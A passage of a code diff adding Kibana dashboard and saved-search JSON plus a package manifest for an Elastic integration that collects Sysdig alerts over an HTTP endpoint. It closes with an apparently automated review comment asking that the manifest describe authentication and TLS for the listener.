"scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "046f84d4-e094-48f7-86bd-9cd22a76b380", + "isMetric": false, + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "1cfbc396-e6f5-47be-b610-0d2f3bd36b39", + 
"isMetric": true, + "isTransposed": false + } + ], + "layerId": "82eea8c4-375f-40ef-8a3f-a993d383826d", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "f039303b-80d7-41d9-9a63-40767cb7a2b4", + "w": 24, + "x": 0, + "y": 29 + }, + "panelIndex": "f039303b-80d7-41d9-9a63-40767cb7a2b4", + "title": "Rules Triggered - Top 10 [Logs Sysdig]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "columns": [ + "@timestamp", + "event.original", + "host.name", + "log.syslog.severity.name" + ], + "grid": {}, + "hideChart": false, + "isTextBasedQuery": false, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "sysdig.alerts" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "sysdig.alerts" + } + } + } + ], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "timeRestore": false + }, + "enhancements": {} + }, + "gridData": { + "h": 15, + "i": "08a84391-ddb3-4e4a-a0c7-d23ffc29262b", + "w": 24, + "x": 24, + "y": 29 + }, + "panelIndex": "08a84391-ddb3-4e4a-a0c7-d23ffc29262b", + "type": "search" + } + ], + "timeRestore": false, + "title": "[Logs Sysdig] Alerts Overview", + "version": 2 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-09-03T17:27:13.645Z", + 
"created_by": "u_mGBROF_q5bmFCATbLXAcCwKa0k8JvONAwSruelyKA5E_0", + "id": "sysdig-fae0ccf1-e806-4876-a7fa-7258b094b15b", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7f8a3857-9646-4e87-a909-7836592adc1c:indexpattern-datasource-layer-9352d482-2466-4287-8f85-cc92b8467ed3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c68eebc4-4682-49a0-88f7-22668fb883ad:indexpattern-datasource-layer-e7feffed-f114-424a-9408-e0a423fae0ae", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "05632923-d5d0-4fb4-8e30-c4c91d625814:indexpattern-datasource-layer-b633214f-c828-455e-96c6-1ac90976ee31", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9cce2923-fcb6-4669-a18b-a6ce56bd7c6f:indexpattern-datasource-layer-fceae10d-23d2-4b72-85ea-8f92cf73a437", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f039303b-80d7-41d9-9a63-40767cb7a2b4:indexpattern-datasource-layer-82eea8c4-375f-40ef-8a3f-a993d383826d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "08a84391-ddb3-4e4a-a0c7-d23ffc29262b:kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "08a84391-ddb3-4e4a-a0c7-d23ffc29262b:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_5638457b-3f24-4bf0-9ef7-c80b2c10436d:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_04e85dec-ba9f-4c82-933f-7b0948c83609:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_5145797a-1b1a-4af7-a727-e78bc8f820f5:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_04629dab-a612-46d1-ae42-4387909be583:optionsListDataView", + "type": "index-pattern" + } + ], + 
"type": "dashboard", + "typeMigrationVersion": "10.2.0" +} \ No newline at end of file diff --git a/packages/sysdig/kibana/search/sysdig-de7b4ea8-76b6-43ba-97ee-6fb519bd610b.json b/packages/sysdig/kibana/search/sysdig-de7b4ea8-76b6-43ba-97ee-6fb519bd610b.json new file mode 100644 index 00000000000..b063d90e32d --- /dev/null +++ b/packages/sysdig/kibana/search/sysdig-de7b4ea8-76b6-43ba-97ee-6fb519bd610b.json @@ -0,0 +1,73 @@ +{ + "attributes": { + "columns": [ + "@timestamp", + "event.original", + "host.name", + "log.syslog.severity.name" + ], + "description": "", + "grid": {}, + "hideChart": false, + "isTextBasedQuery": false, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "sysdig.alerts" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "sysdig.alerts" + } + } + } + ], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "timeRestore": false, + "title": "Alert Stream [Logs Sysdig]" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-08-22T15:56:04.848Z", + "created_by": "u_mGBROF_q5bmFCATbLXAcCwKa0k8JvONAwSruelyKA5E_0", + "id": "sysdig-de7b4ea8-76b6-43ba-97ee-6fb519bd610b", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "type": "search", + "typeMigrationVersion": "10.3.0" +} \ No newline at end of file 
diff --git a/packages/sysdig/manifest.yml b/packages/sysdig/manifest.yml
new file mode 100644
index 00000000000..7406c41ee00
--- /dev/null
+++ b/packages/sysdig/manifest.yml
@@ -0,0 +1,37 @@
+format_version: 3.2.1
+name: sysdig
+title: "Sysdig"
+version: 0.1.0
+description: "Collect alerts from Sysdig using Elastic Agent."
+type: integration
+categories:
+ - containers
+ - kubernetes
+ - monitoring
+ - security
+conditions:
+ kibana:
+ version: "^8.14.1"
+ elastic:
+ subscription: "basic"
+screenshots:
+ - src: /img/sysdig-events-screenshot.png
+ title: Sysdig Events dashboard screenshot
+ size: 600x600
+ type: image/png
+icons:
+ - src: /img/sysdig-logo-badge.svg
+ title: Sysdig logo
+ size: 88x32
+ type: image/svg+xml
+policy_templates:
+ - name: sysdig
+ title: Sysdig Alerts
+ description: Collect Alerts from Sysdig using Elastic Agent
+ inputs:
+ - type: http_endpoint
+ title: Collect Sysdig Alerts via HTTP
+ description: Collect Sysdig Alerts via HTTP input
+owner:
+ github: elastic/security-service-integrations
+ type: elastic
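Review bot: The `http_endpoint` input in `policy_templates` opens an inbound listener for Sysdig webhooks, but its title and description say nothing about how callers are authenticated or whether the listener is TLS-protected, and the manifest is the first thing a user reads when enabling the integration; something like `description: Collect Sysdig alerts over an HTTP listener; configure the shared-secret header and TLS so that only Sysdig can post to it` would set the expectation. The variables that enforce this (secret header, SSL settings) would live in the data stream manifest, which is not part of this diff, so this is an inferred gap — confirm they are exposed there and referenced from the README. The policy-template `description` also repeats the package-level wording with different capitalisation ("Collect Alerts" vs "Collect alerts"); pick one.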